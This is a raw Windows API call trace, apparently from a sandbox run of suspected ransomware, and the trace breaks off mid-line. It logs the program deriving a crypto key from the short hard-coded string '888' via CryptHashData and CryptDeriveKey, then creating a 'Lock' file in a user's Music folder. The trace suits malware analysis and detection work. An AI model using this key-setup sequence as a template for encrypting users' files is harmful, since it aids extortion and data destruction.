WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0207.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7080, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0207.037] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c660) returned 1 [0207.037] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.037] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.038] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0207.038] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.038] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0207.038] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.038] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.038] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.038] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.038] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.038] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.038] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0207.038] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.038] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0207.038] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.038] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.038] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0207.038] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0207.038] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.038] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.038] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.038] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0207.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.038] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0207.038] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.039] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0207.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.039] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0207.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.039] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0207.039] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.039] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0207.039] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.039] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0207.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.039] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.039] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0207.039] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.039] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0207.039] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.039] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.040] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0207.040] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0207.040] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.040] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.040] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.040] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.040] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.040] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.040] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.040] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0207.040] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.040] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0207.040] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.040] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.040] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0207.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaab58, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0207.040] CryptCreateHash (in: hProv=0xa7c660, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0207.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0207.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0207.041] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0207.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0207.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0207.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.041] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.041] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.041] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.041] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.041] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.041] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0207.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaad50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0207.041] CryptHashData (hHash=0x9e21f8, pbData=0x2a71a48, dwDataLen=0x3, dwFlags=0x1) returned 1 [0207.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.041] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.042] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.042] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.042] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.042] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.042] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.042] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0207.042] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.042] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0207.042] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.042] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0207.042] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0207.042] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaaed0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0207.042] CryptDeriveKey (in: hProv=0xa7c660, Algid=0x6601, hBaseData=0x9e21f8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1eb8) returned 1 [0207.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.042] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.042] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0207.043] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0207.043] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0207.043] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0207.043] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0207.043] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0207.043] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7080, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0207.043] CryptDestroyHash (hHash=0x9e21f8) returned 1 [0207.043] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.043] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.043] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.043] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.043] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.044] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\orL7CLboBO" (normalized: "c:\\users\\fd1hvy\\music\\orl7clbobo"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0207.044] GetLastError () returned 0x5 [0207.044] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0207.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0207.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0207.044] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0207.044] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0207.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0207.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0207.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0207.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0207.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0207.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0207.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0207.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0207.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0207.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0207.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0207.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0207.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0207.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0207.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0207.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0207.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a75000 [0207.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0207.045] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0207.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75000 | out: hHeap=0x2af0000) returned 1 [0207.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0207.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0207.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0207.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0207.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0207.045] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock.orL7CLboBO" (normalized: "c:\\users\\fd1hvy\\music\\lock.orl7clbobo"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0207.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 